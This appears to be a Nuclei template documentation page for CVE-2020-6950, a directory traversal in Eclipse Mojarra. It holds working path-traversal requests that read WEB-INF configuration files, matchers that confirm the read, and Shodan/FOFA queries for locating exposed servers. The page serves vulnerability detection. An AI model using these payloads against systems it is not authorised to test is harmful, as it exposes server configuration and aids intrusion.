Skip to content
Nuclei Templates

Eclipse Mojarra - Local File Read

ID: CVE-2020-6950

Severity: medium

Author: iamnoooob,pdresearch

Tags: cve,cve2020,mojarra,lfi,eclipse

Description

Section titled “Description”

Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2020-6950


info:
  name: Eclipse Mojarra - Local File Read
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.
  reference:
    - https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741
    - https://github.com/eclipse-ee4j/mojarra/issues/4571
    - https://nvd.nist.gov/vuln/detail/CVE-2020-6950
    - https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943
    - https://www.oracle.com/security-alerts/cpuapr2022.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-6950
    cwe-id: CWE-22
    epss-score: 0.03924
    epss-percentile: 0.91979
    cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: eclipse
    product: mojarra
    shodan-query:
      - html:"javax.faces.resource"
      - http.html:"javax.faces.viewstate"
      - http.html:"javax.faces.resource"
    fofa-query:
      - body="javax.faces.ViewState"
      - body="javax.faces.viewstate"
      - body="javax.faces.resource"
  tags: cve,cve2020,mojarra,lfi,eclipse


http:
  - method: GET
    path:
      - "{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF"
      - "{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF"
      - "{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF"
      - "{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF"


    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/xml")'
          - 'contains_all(body, "<web-app", "<servlet>") || contains_all(body, "<faces-config", "</faces-config>")'
        condition: and
# digest: 4a0a00473045022100e191f30224f8a92425cfa757a1d8207dc7f90d31817ce278abd9c6137488e1a8022037c0132dc8676a639bd24584bfacb90e3105f11c0bbd9e47c575f5eb366c9ddf:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-6950.yaml"

View on Github